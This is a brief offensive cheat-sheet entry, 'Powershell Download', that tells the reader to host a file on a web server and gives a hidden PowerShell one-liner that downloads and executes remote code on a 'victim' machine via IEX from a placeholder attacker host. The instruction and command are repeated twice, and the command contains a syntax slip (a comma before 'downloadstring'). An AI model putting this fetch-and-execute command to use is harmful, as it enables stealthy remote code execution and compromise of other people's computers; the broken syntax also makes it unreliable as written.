Powershell Download
Host file on a webpage. Use this command to download file to victim
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient),downloadstring('http://<ip>:<port>/<file>'))"
Host file on a webpage. Use this command to download file to victim
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient),downloadstring('http://<ip>:<port>/<file>'))"